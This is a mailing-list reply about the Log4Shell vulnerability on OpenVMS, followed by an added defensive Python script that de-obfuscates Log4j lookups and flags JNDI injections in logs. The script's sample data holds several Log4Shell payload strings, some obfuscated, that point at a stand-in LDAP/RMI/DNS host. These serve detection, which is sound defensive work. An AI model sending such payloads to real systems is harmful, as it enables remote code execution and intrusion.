[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228
Craig A. Berry
craigberry at nospam.mac.com
Tue Dec 14 12:43:32 EST 2021
On 12/14/21 10:51 AM, Arne Vajhøj wrote:
> On 12/14/2021 11:39 AM, Stephen Hoffman wrote:
>> Early reports that Java 8 and newer were
>> not vulnerable were later found incorrect.
>
> So you are saying that the deserialization protections done in 9 and
> backported to 8u121 are not enough to prevent this vulnerability?
Those protections block one of several deserialization mechanisms. It
helps a little for what I understand to be the easiest way to execute
remote code. But we're way beyond what's easiest for the state actors
and others who are investing a lot of resources into exploiting this in
the wild. So do upgrade Java. But don't stop there.
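The point in the message above is that the JDK-side protections (refusing to load remote classes over RMI/LDAP) close only one of the paths an attacker can take once a `${jndi:...}` lookup is evaluated, so a log-side check for the lookup itself is worth having regardless of JVM version. The script below is an added example, not code from this thread or from the Log4j project. It undoes the common ways the `jndi` token is hidden using Log4j 2's own substitution syntax (`${lower:}`, `${upper:}` and the `${prefix:key:-default}` fallback form) before looking for the lookup, and reports the JNDI scheme used. The sample log lines are constructed for the example (TEST-NET addresses); the lookup handling covers only those three forms and is an approximation of Log4j's interpolator, not a reimplementation of it.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Innermost ${...} lookup: a body with no further '${', '$' or braces inside.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A fully assembled JNDI lookup, e.g. ${jndi:ldap://host:1389/a}; the
# scheme (ldap, rmi, dns, ...) is captured in group 1.
JNDI = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):[^}]*\}", re.IGNORECASE)


def resolve_one(body: str) -> Optional[str]:
    """Resolve one lookup body the way an attacker relies on Log4j 2 doing it.

    Only the lookups seen in obfuscated payloads are handled (assumption of
    this example): the ':-default' fallback form and lower/upper.  Returns
    None when the lookup is left as written (unknown lookup, or jndi itself).
    """
    if body.lower().startswith("jndi:"):
        return None
    if ":-" in body:                      # ${prefix:key:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if not sep:
        return None
    prefix = prefix.lower()
    if prefix == "lower":
        return value.lower()
    if prefix == "upper":
        return value.upper()
    return None


def normalize(line: str, max_passes: int = 20) -> str:
    """Repeatedly resolve innermost lookups until nothing changes.

    max_passes bounds the work on adversarial input; each pass resolves
    every innermost lookup, so deeply nested payloads converge quickly.
    """
    for _ in range(max_passes):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            out = resolve_one(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        line = INNER.sub(repl, line)
        if not changed:
            break
    return line


@dataclass
class Finding:
    line_no: int
    scheme: str      # JNDI scheme after de-obfuscation, lower-cased
    lookup: str      # the reconstructed ${jndi:...} text
    raw: str         # the original log line, for the analyst


def scan(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup found after normalization."""
    findings: List[Finding] = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        for m in JNDI.finditer(norm):
            findings.append(Finding(n, m.group(1).lower(), m.group(0), raw))
    return findings


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    'GET / HTTP/1.1 200 "Mozilla/5.0"',
    'GET / HTTP/1.1 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 200 "${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/obj}"',
    'GET / HTTP/1.1 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/x}"',
    'GET /login HTTP/1.1 401 "${${env:NaN:-j}ndi:dns://198.51.100.7/x}"',
    'INFO  log4j pattern ${date:yyyy} configured',   # benign lookup, no jndi
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme:<4} {f.lookup}")
```

Run against a real access or application log one line at a time; a hit on `ldap`, `rmi` or `dns` is only a probe until the lookup was actually evaluated, so pair it with the Log4j version in use and with outbound-connection logs from the host.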